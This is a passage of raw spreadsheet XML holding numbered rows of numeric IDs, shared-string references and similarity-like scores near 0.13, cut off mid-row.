    <row r="25802" ht="15.75" customHeight="1">
      <c r="A25802" s="1">
        <v>20712.0</v>
      </c>
      <c r="B25802" s="2">
        <v>1.4600583E7</v>
      </c>
      <c r="C25802" s="2" t="s">
        <v>24814</v>
      </c>
      <c r="D25802" s="2">
        <v>1.0</v>
      </c>
      <c r="E25802" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25802" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25803" ht="15.75" customHeight="1">
      <c r="A25803" s="1">
        <v>20816.0</v>
      </c>
      <c r="B25803" s="2">
        <v>1.5342515E7</v>
      </c>
      <c r="C25803" s="2" t="s">
        <v>24815</v>
      </c>
      <c r="D25803" s="2">
        <v>1.0</v>
      </c>
      <c r="E25803" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25803" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25804" ht="15.75" customHeight="1">
      <c r="A25804" s="1">
        <v>21195.0</v>
      </c>
      <c r="B25804" s="2">
        <v>1.935128E7</v>
      </c>
      <c r="C25804" s="2" t="s">
        <v>24816</v>
      </c>
      <c r="D25804" s="2">
        <v>1.0</v>
      </c>
      <c r="E25804" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25804" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25805" ht="15.75" customHeight="1">
      <c r="A25805" s="1">
        <v>21321.0</v>
      </c>
      <c r="B25805" s="2">
        <v>2.0925895E7</v>
      </c>
      <c r="C25805" s="2" t="s">
        <v>24817</v>
      </c>
      <c r="D25805" s="2">
        <v>1.0</v>
      </c>
      <c r="E25805" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25805" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25806" ht="15.75" customHeight="1">
      <c r="A25806" s="1">
        <v>21671.0</v>
      </c>
      <c r="B25806" s="2">
        <v>2.5016995E7</v>
      </c>
      <c r="C25806" s="2" t="s">
        <v>24818</v>
      </c>
      <c r="D25806" s="2">
        <v>1.0</v>
      </c>
      <c r="E25806" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25806" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25807" ht="15.75" customHeight="1">
      <c r="A25807" s="1">
        <v>22447.0</v>
      </c>
      <c r="B25807" s="2">
        <v>3625105.0</v>
      </c>
      <c r="C25807" s="2" t="s">
        <v>24819</v>
      </c>
      <c r="D25807" s="2">
        <v>1.0</v>
      </c>
      <c r="E25807" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25807" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25808" ht="15.75" customHeight="1">
      <c r="A25808" s="1">
        <v>22513.0</v>
      </c>
      <c r="B25808" s="2">
        <v>3.754252E7</v>
      </c>
      <c r="C25808" s="2" t="s">
        <v>24820</v>
      </c>
      <c r="D25808" s="2">
        <v>1.0</v>
      </c>
      <c r="E25808" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25808" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25809" ht="15.75" customHeight="1">
      <c r="A25809" s="1">
        <v>22590.0</v>
      </c>
      <c r="B25809" s="2">
        <v>3.9107226E7</v>
      </c>
      <c r="C25809" s="2" t="s">
        <v>24821</v>
      </c>
      <c r="D25809" s="2">
        <v>1.0</v>
      </c>
      <c r="E25809" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25809" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25810" ht="15.75" customHeight="1">
      <c r="A25810" s="1">
        <v>22600.0</v>
      </c>
      <c r="B25810" s="2">
        <v>3.9479271E7</v>
      </c>
      <c r="C25810" s="2" t="s">
        <v>24822</v>
      </c>
      <c r="D25810" s="2">
        <v>1.0</v>
      </c>
      <c r="E25810" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25810" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25811" ht="15.75" customHeight="1">
      <c r="A25811" s="1">
        <v>22669.0</v>
      </c>
      <c r="B25811" s="2">
        <v>4.1430157E7</v>
      </c>
      <c r="C25811" s="2" t="s">
        <v>24823</v>
      </c>
      <c r="D25811" s="2">
        <v>1.0</v>
      </c>
      <c r="E25811" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25811" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25812" ht="15.75" customHeight="1">
      <c r="A25812" s="1">
        <v>22876.0</v>
      </c>
      <c r="B25812" s="2">
        <v>4.7524184E7</v>
      </c>
      <c r="C25812" s="2" t="s">
        <v>24824</v>
      </c>
      <c r="D25812" s="2">
        <v>1.0</v>
      </c>
      <c r="E25812" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25812" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25813" ht="15.75" customHeight="1">
      <c r="A25813" s="1">
        <v>22989.0</v>
      </c>
      <c r="B25813" s="2">
        <v>4.9418531E7</v>
      </c>
      <c r="C25813" s="2" t="s">
        <v>24825</v>
      </c>
      <c r="D25813" s="2">
        <v>1.0</v>
      </c>
      <c r="E25813" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25813" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25814" ht="15.75" customHeight="1">
      <c r="A25814" s="1">
        <v>23045.0</v>
      </c>
      <c r="B25814" s="2">
        <v>5017356.0</v>
      </c>
      <c r="C25814" s="2" t="s">
        <v>24826</v>
      </c>
      <c r="D25814" s="2">
        <v>1.0</v>
      </c>
      <c r="E25814" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25814" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25815" ht="15.75" customHeight="1">
      <c r="A25815" s="1">
        <v>23177.0</v>
      </c>
      <c r="B25815" s="2">
        <v>5214024.0</v>
      </c>
      <c r="C25815" s="2" t="s">
        <v>24827</v>
      </c>
      <c r="D25815" s="2">
        <v>1.0</v>
      </c>
      <c r="E25815" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25815" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25816" ht="15.75" customHeight="1">
      <c r="A25816" s="1">
        <v>23202.0</v>
      </c>
      <c r="B25816" s="2">
        <v>5.2484715E7</v>
      </c>
      <c r="C25816" s="2" t="s">
        <v>24828</v>
      </c>
      <c r="D25816" s="2">
        <v>1.0</v>
      </c>
      <c r="E25816" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25816" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25817" ht="15.75" customHeight="1">
      <c r="A25817" s="1">
        <v>23462.0</v>
      </c>
      <c r="B25817" s="2">
        <v>5.7017822E7</v>
      </c>
      <c r="C25817" s="2" t="s">
        <v>24829</v>
      </c>
      <c r="D25817" s="2">
        <v>1.0</v>
      </c>
      <c r="E25817" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25817" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25818" ht="15.75" customHeight="1">
      <c r="A25818" s="1">
        <v>23934.0</v>
      </c>
      <c r="B25818" s="2">
        <v>8685973.0</v>
      </c>
      <c r="C25818" s="2" t="s">
        <v>24830</v>
      </c>
      <c r="D25818" s="2">
        <v>1.0</v>
      </c>
      <c r="E25818" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25818" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25819" ht="15.75" customHeight="1">
      <c r="A25819" s="1">
        <v>24701.0</v>
      </c>
      <c r="B25819" s="2">
        <v>1.1650585E7</v>
      </c>
      <c r="C25819" s="2" t="s">
        <v>24831</v>
      </c>
      <c r="D25819" s="2">
        <v>1.0</v>
      </c>
      <c r="E25819" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25819" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25820" ht="15.75" customHeight="1">
      <c r="A25820" s="1">
        <v>25419.0</v>
      </c>
      <c r="B25820" s="2">
        <v>1.3797436E7</v>
      </c>
      <c r="C25820" s="2" t="s">
        <v>24832</v>
      </c>
      <c r="D25820" s="2">
        <v>1.0</v>
      </c>
      <c r="E25820" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25820" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25821" ht="15.75" customHeight="1">
      <c r="A25821" s="1">
        <v>25751.0</v>
      </c>
      <c r="B25821" s="2">
        <v>1.4600582E7</v>
      </c>
      <c r="C25821" s="2" t="s">
        <v>24814</v>
      </c>
      <c r="D25821" s="2">
        <v>1.0</v>
      </c>
      <c r="E25821" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25821" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25822" ht="15.75" customHeight="1">
      <c r="A25822" s="1">
        <v>25793.0</v>
      </c>
      <c r="B25822" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C25822" s="2" t="s">
        <v>24833</v>
      </c>
      <c r="D25822" s="2">
        <v>1.0</v>
      </c>
      <c r="E25822" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25822" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25823" ht="15.75" customHeight="1">
      <c r="A25823" s="1">
        <v>26140.0</v>
      </c>
      <c r="B25823" s="2">
        <v>1.6031238E7</v>
      </c>
      <c r="C25823" s="2" t="s">
        <v>24834</v>
      </c>
      <c r="D25823" s="2">
        <v>1.0</v>
      </c>
      <c r="E25823" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25823" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25824" ht="15.75" customHeight="1">
      <c r="A25824" s="1">
        <v>26447.0</v>
      </c>
      <c r="B25824" s="2">
        <v>1.7279983E7</v>
      </c>
      <c r="C25824" s="2" t="s">
        <v>24835</v>
      </c>
      <c r="D25824" s="2">
        <v>1.0</v>
      </c>
      <c r="E25824" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25824" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25825" ht="15.75" customHeight="1">
      <c r="A25825" s="1">
        <v>26951.0</v>
      </c>
      <c r="B25825" s="2">
        <v>1.9608343E7</v>
      </c>
      <c r="C25825" s="2" t="s">
        <v>24836</v>
      </c>
      <c r="D25825" s="2">
        <v>1.0</v>
      </c>
      <c r="E25825" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25825" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25826" ht="15.75" customHeight="1">
      <c r="A25826" s="1">
        <v>27023.0</v>
      </c>
      <c r="B25826" s="2">
        <v>2.0036703E7</v>
      </c>
      <c r="C25826" s="2" t="s">
        <v>24837</v>
      </c>
      <c r="D25826" s="2">
        <v>1.0</v>
      </c>
      <c r="E25826" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25826" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25827" ht="15.75" customHeight="1">
      <c r="A25827" s="1">
        <v>27197.0</v>
      </c>
      <c r="B25827" s="2">
        <v>2.0925894E7</v>
      </c>
      <c r="C25827" s="2" t="s">
        <v>24817</v>
      </c>
      <c r="D25827" s="2">
        <v>1.0</v>
      </c>
      <c r="E25827" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25827" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25828" ht="15.75" customHeight="1">
      <c r="A25828" s="1">
        <v>27284.0</v>
      </c>
      <c r="B25828" s="2">
        <v>2.1239026E7</v>
      </c>
      <c r="C25828" s="2" t="s">
        <v>24838</v>
      </c>
      <c r="D25828" s="2">
        <v>1.0</v>
      </c>
      <c r="E25828" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25828" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25829" ht="15.75" customHeight="1">
      <c r="A25829" s="1">
        <v>27988.0</v>
      </c>
      <c r="B25829" s="2">
        <v>2.4060541E7</v>
      </c>
      <c r="C25829" s="2" t="s">
        <v>24839</v>
      </c>
      <c r="D25829" s="2">
        <v>1.0</v>
      </c>
      <c r="E25829" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25829" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25830" ht="15.75" customHeight="1">
      <c r="A25830" s="1">
        <v>28201.0</v>
      </c>
      <c r="B25830" s="2">
        <v>2.5016994E7</v>
      </c>
      <c r="C25830" s="2" t="s">
        <v>24818</v>
      </c>
      <c r="D25830" s="2">
        <v>1.0</v>
      </c>
      <c r="E25830" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25830" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25831" ht="15.75" customHeight="1">
      <c r="A25831" s="1">
        <v>29578.0</v>
      </c>
      <c r="B25831" s="2">
        <v>3.3425625E7</v>
      </c>
      <c r="C25831" s="2" t="s">
        <v>24840</v>
      </c>
      <c r="D25831" s="2">
        <v>1.0</v>
      </c>
      <c r="E25831" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25831" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25832" ht="15.75" customHeight="1">
      <c r="A25832" s="1">
        <v>29923.0</v>
      </c>
      <c r="B25832" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C25832" s="2" t="s">
        <v>24841</v>
      </c>
      <c r="D25832" s="2">
        <v>1.0</v>
      </c>
      <c r="E25832" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25832" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25833" ht="15.75" customHeight="1">
      <c r="A25833" s="1">
        <v>29934.0</v>
      </c>
      <c r="B25833" s="2">
        <v>3607120.0</v>
      </c>
      <c r="C25833" s="2" t="s">
        <v>24842</v>
      </c>
      <c r="D25833" s="2">
        <v>1.0</v>
      </c>
      <c r="E25833" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25833" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25834" ht="15.75" customHeight="1">
      <c r="A25834" s="1">
        <v>29992.0</v>
      </c>
      <c r="B25834" s="2">
        <v>3612218.0</v>
      </c>
      <c r="C25834" s="2" t="s">
        <v>24843</v>
      </c>
      <c r="D25834" s="2">
        <v>1.0</v>
      </c>
      <c r="E25834" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25834" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25835" ht="15.75" customHeight="1">
      <c r="A25835" s="1">
        <v>29998.0</v>
      </c>
      <c r="B25835" s="2">
        <v>3612620.0</v>
      </c>
      <c r="C25835" s="2" t="s">
        <v>24844</v>
      </c>
      <c r="D25835" s="2">
        <v>1.0</v>
      </c>
      <c r="E25835" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25835" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25836" ht="15.75" customHeight="1">
      <c r="A25836" s="1">
        <v>30240.0</v>
      </c>
      <c r="B25836" s="2">
        <v>3.7542519E7</v>
      </c>
      <c r="C25836" s="2" t="s">
        <v>24820</v>
      </c>
      <c r="D25836" s="2">
        <v>1.0</v>
      </c>
      <c r="E25836" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25836" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25837" ht="15.75" customHeight="1">
      <c r="A25837" s="1">
        <v>30368.0</v>
      </c>
      <c r="B25837" s="2">
        <v>3.8387431E7</v>
      </c>
      <c r="C25837" s="2" t="s">
        <v>24845</v>
      </c>
      <c r="D25837" s="2">
        <v>1.0</v>
      </c>
      <c r="E25837" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25837" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25838" ht="15.75" customHeight="1">
      <c r="A25838" s="1">
        <v>30603.0</v>
      </c>
      <c r="B25838" s="2">
        <v>4133664.0</v>
      </c>
      <c r="C25838" s="2" t="s">
        <v>24846</v>
      </c>
      <c r="D25838" s="2">
        <v>1.0</v>
      </c>
      <c r="E25838" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25838" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25839" ht="15.75" customHeight="1">
      <c r="A25839" s="1">
        <v>31254.0</v>
      </c>
      <c r="B25839" s="2">
        <v>4.941853E7</v>
      </c>
      <c r="C25839" s="2" t="s">
        <v>24825</v>
      </c>
      <c r="D25839" s="2">
        <v>1.0</v>
      </c>
      <c r="E25839" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25839" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25840" ht="15.75" customHeight="1">
      <c r="A25840" s="1">
        <v>31691.0</v>
      </c>
      <c r="B25840" s="2">
        <v>5192460.0</v>
      </c>
      <c r="C25840" s="2" t="s">
        <v>24847</v>
      </c>
      <c r="D25840" s="2">
        <v>1.0</v>
      </c>
      <c r="E25840" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25840" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25841" ht="15.75" customHeight="1">
      <c r="A25841" s="1">
        <v>32239.0</v>
      </c>
      <c r="B25841" s="2">
        <v>5503812.0</v>
      </c>
      <c r="C25841" s="2" t="s">
        <v>24848</v>
      </c>
      <c r="D25841" s="2">
        <v>1.0</v>
      </c>
      <c r="E25841" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25841" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25842" ht="15.75" customHeight="1">
      <c r="A25842" s="1">
        <v>32532.0</v>
      </c>
      <c r="B25842" s="2">
        <v>5734173.0</v>
      </c>
      <c r="C25842" s="2" t="s">
        <v>24849</v>
      </c>
      <c r="D25842" s="2">
        <v>1.0</v>
      </c>
      <c r="E25842" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25842" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25843" ht="15.75" customHeight="1">
      <c r="A25843" s="1">
        <v>33778.0</v>
      </c>
      <c r="B25843" s="2">
        <v>8685972.0</v>
      </c>
      <c r="C25843" s="2" t="s">
        <v>24830</v>
      </c>
      <c r="D25843" s="2">
        <v>1.0</v>
      </c>
      <c r="E25843" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25843" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="25844" ht="15.75" customHeight="1">
      <c r="A25844" s="1">
        <v>19235.0</v>
      </c>
      <c r="B25844" s="2">
        <v>5.5075198E7</v>
      </c>
      <c r="C25844" s="2" t="s">
        <v>24850</v>
      </c>
      <c r="D25844" s="2">
        <v>1.0</v>
      </c>
      <c r="E25844" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25844" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="25845" ht="15.75" customHeight="1">
      <c r="A25845" s="1">
        <v>22239.0</v>
      </c>
      <c r="B25845" s="2">
        <v>3.2570316E7</v>
      </c>
      <c r="C25845" s="2" t="s">
        <v>24851</v>
      </c>
      <c r="D25845" s="2">
        <v>1.0</v>
      </c>
      <c r="E25845" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25845" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="25846" ht="15.75" customHeight="1">
      <c r="A25846" s="1">
        <v>27476.0</v>
      </c>
      <c r="B25846" s="2">
        <v>2.1989826E7</v>
      </c>
      <c r="C25846" s="2" t="s">
        <v>24852</v>
      </c>
      <c r="D25846" s="2">
        <v>1.0</v>
      </c>
      <c r="E25846" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25846" s="2">
        <v>0.1299603174603174</v>
      </c>
    </row>
    <row r="25847" ht="15.75" customHeight="1">
      <c r="A25847" s="1">
        <v>6381.0</v>
      </c>
      <c r="B25847" s="2">
        <v>4.8415275E7</v>
      </c>
      <c r="C25847" s="2" t="s">
        <v>24853</v>
      </c>
      <c r="D25847" s="2">
        <v>1.0</v>
      </c>
      <c r="E25847" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25847" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="25848" ht="15.75" customHeight="1">
      <c r="A25848" s="1">
        <v>8126.0</v>
      </c>
      <c r="B25848" s="2">
        <v>5.3090156E7</v>
      </c>
      <c r="C25848" s="2" t="s">
        <v>24854</v>
      </c>
      <c r="D25848" s="2">
        <v>1.0</v>
      </c>
      <c r="E25848" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25848" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="25849" ht="15.75" customHeight="1">
      <c r="A25849" s="1">
        <v>22515.0</v>
      </c>
      <c r="B25849" s="2">
        <v>3.7545733E7</v>
      </c>
      <c r="C25849" s="2" t="s">
        <v>24855</v>
      </c>
      <c r="D25849" s="2">
        <v>1.0</v>
      </c>
      <c r="E25849" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25849" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="25850" ht="15.75" customHeight="1">
      <c r="A25850" s="1">
        <v>15788.0</v>
      </c>
      <c r="B25850" s="2">
        <v>4.4208931E7</v>
      </c>
      <c r="C25850" s="2" t="s">
        <v>24856</v>
      </c>
      <c r="D25850" s="2">
        <v>1.0</v>
      </c>
      <c r="E25850" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25850" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="25851" ht="15.75" customHeight="1">
      <c r="A25851" s="1">
        <v>17261.0</v>
      </c>
      <c r="B25851" s="2">
        <v>4.9146836E7</v>
      </c>
      <c r="C25851" s="2" t="s">
        <v>24857</v>
      </c>
      <c r="D25851" s="2">
        <v>1.0</v>
      </c>
      <c r="E25851" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25851" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="25852" ht="15.75" customHeight="1">
      <c r="A25852" s="1">
        <v>29927.0</v>
      </c>
      <c r="B25852" s="2">
        <v>3607052.0</v>
      </c>
      <c r="C25852" s="2" t="s">
        <v>24858</v>
      </c>
      <c r="D25852" s="2">
        <v>1.0</v>
      </c>
      <c r="E25852" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25852" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="25853" ht="15.75" customHeight="1">
      <c r="A25853" s="1">
        <v>33351.0</v>
      </c>
      <c r="B25853" s="2">
        <v>7607857.0</v>
      </c>
      <c r="C25853" s="2" t="s">
        <v>24859</v>
      </c>
      <c r="D25853" s="2">
        <v>1.0</v>
      </c>
      <c r="E25853" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25853" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="25854" ht="15.75" customHeight="1">
      <c r="A25854" s="1">
        <v>28491.0</v>
      </c>
      <c r="B25854" s="2">
        <v>2.6668667E7</v>
      </c>
      <c r="C25854" s="2" t="s">
        <v>24860</v>
      </c>
      <c r="D25854" s="2">
        <v>1.0</v>
      </c>
      <c r="E25854" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25854" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="25855" ht="15.75" customHeight="1">
      <c r="A25855" s="1">
        <v>69.0</v>
      </c>
      <c r="B25855" s="2">
        <v>1.1632745E7</v>
      </c>
      <c r="C25855" s="2" t="s">
        <v>24861</v>
      </c>
      <c r="D25855" s="2">
        <v>1.0</v>
      </c>
      <c r="E25855" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25855" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="25856" ht="15.75" customHeight="1">
      <c r="A25856" s="1">
        <v>10839.0</v>
      </c>
      <c r="B25856" s="2">
        <v>1.6024413E7</v>
      </c>
      <c r="C25856" s="2" t="s">
        <v>24862</v>
      </c>
      <c r="D25856" s="2">
        <v>1.0</v>
      </c>
      <c r="E25856" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25856" s="2">
        <v>0.1291079812206573</v>
      </c>
    </row>
    <row r="25857" ht="15.75" customHeight="1">
      <c r="A25857" s="1">
        <v>796.0</v>
      </c>
      <c r="B25857" s="2">
        <v>2.1228484E7</v>
      </c>
      <c r="C25857" s="2" t="s">
        <v>24863</v>
      </c>
      <c r="D25857" s="2">
        <v>1.0</v>
      </c>
      <c r="E25857" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25857" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="25858" ht="15.75" customHeight="1">
      <c r="A25858" s="1">
        <v>30174.0</v>
      </c>
      <c r="B25858" s="2">
        <v>3.7144386E7</v>
      </c>
      <c r="C25858" s="2" t="s">
        <v>24864</v>
      </c>
      <c r="D25858" s="2">
        <v>1.0</v>
      </c>
      <c r="E25858" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25858" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="25859" ht="15.75" customHeight="1">
      <c r="A25859" s="1">
        <v>33012.0</v>
      </c>
      <c r="B25859" s="2">
        <v>6649178.0</v>
      </c>
      <c r="C25859" s="2" t="s">
        <v>24865</v>
      </c>
      <c r="D25859" s="2">
        <v>1.0</v>
      </c>
      <c r="E25859" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25859" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="25860" ht="15.75" customHeight="1">
      <c r="A25860" s="1">
        <v>23215.0</v>
      </c>
      <c r="B25860" s="2">
        <v>5273630.0</v>
      </c>
      <c r="C25860" s="2" t="s">
        <v>24866</v>
      </c>
      <c r="D25860" s="2">
        <v>1.0</v>
      </c>
      <c r="E25860" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25860" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="25861" ht="15.75" customHeight="1">
      <c r="A25861" s="1">
        <v>31358.0</v>
      </c>
      <c r="B25861" s="2">
        <v>4.9871648E7</v>
      </c>
      <c r="C25861" s="2" t="s">
        <v>24867</v>
      </c>
      <c r="D25861" s="2">
        <v>1.0</v>
      </c>
      <c r="E25861" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25861" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="25862" ht="15.75" customHeight="1">
      <c r="A25862" s="1">
        <v>31711.0</v>
      </c>
      <c r="B25862" s="2">
        <v>5208593.0</v>
      </c>
      <c r="C25862" s="2" t="s">
        <v>24868</v>
      </c>
      <c r="D25862" s="2">
        <v>1.0</v>
      </c>
      <c r="E25862" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25862" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="25863" ht="15.75" customHeight="1">
      <c r="A25863" s="1">
        <v>1516.0</v>
      </c>
      <c r="B25863" s="2">
        <v>2.735299E7</v>
      </c>
      <c r="C25863" s="2" t="s">
        <v>24869</v>
      </c>
      <c r="D25863" s="2">
        <v>1.0</v>
      </c>
      <c r="E25863" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25863" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="25864" ht="15.75" customHeight="1">
      <c r="A25864" s="1">
        <v>6445.0</v>
      </c>
      <c r="B25864" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C25864" s="2" t="s">
        <v>24870</v>
      </c>
      <c r="D25864" s="2">
        <v>1.0</v>
      </c>
      <c r="E25864" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25864" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="25865" ht="15.75" customHeight="1">
      <c r="A25865" s="1">
        <v>17472.0</v>
      </c>
      <c r="B25865" s="2">
        <v>4.9910807E7</v>
      </c>
      <c r="C25865" s="2" t="s">
        <v>24871</v>
      </c>
      <c r="D25865" s="2">
        <v>1.0</v>
      </c>
      <c r="E25865" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25865" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="25866" ht="15.75" customHeight="1">
      <c r="A25866" s="1">
        <v>19232.0</v>
      </c>
      <c r="B25866" s="2">
        <v>5.5072533E7</v>
      </c>
      <c r="C25866" s="2" t="s">
        <v>24872</v>
      </c>
      <c r="D25866" s="2">
        <v>1.0</v>
      </c>
      <c r="E25866" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25866" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="25867" ht="15.75" customHeight="1">
      <c r="A25867" s="1">
        <v>22272.0</v>
      </c>
      <c r="B25867" s="2">
        <v>3.3165639E7</v>
      </c>
      <c r="C25867" s="2" t="s">
        <v>24873</v>
      </c>
      <c r="D25867" s="2">
        <v>1.0</v>
      </c>
      <c r="E25867" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25867" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="25868" ht="15.75" customHeight="1">
      <c r="A25868" s="1">
        <v>23005.0</v>
      </c>
      <c r="B25868" s="2">
        <v>4976391.0</v>
      </c>
      <c r="C25868" s="2" t="s">
        <v>24874</v>
      </c>
      <c r="D25868" s="2">
        <v>1.0</v>
      </c>
      <c r="E25868" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25868" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="25869" ht="15.75" customHeight="1">
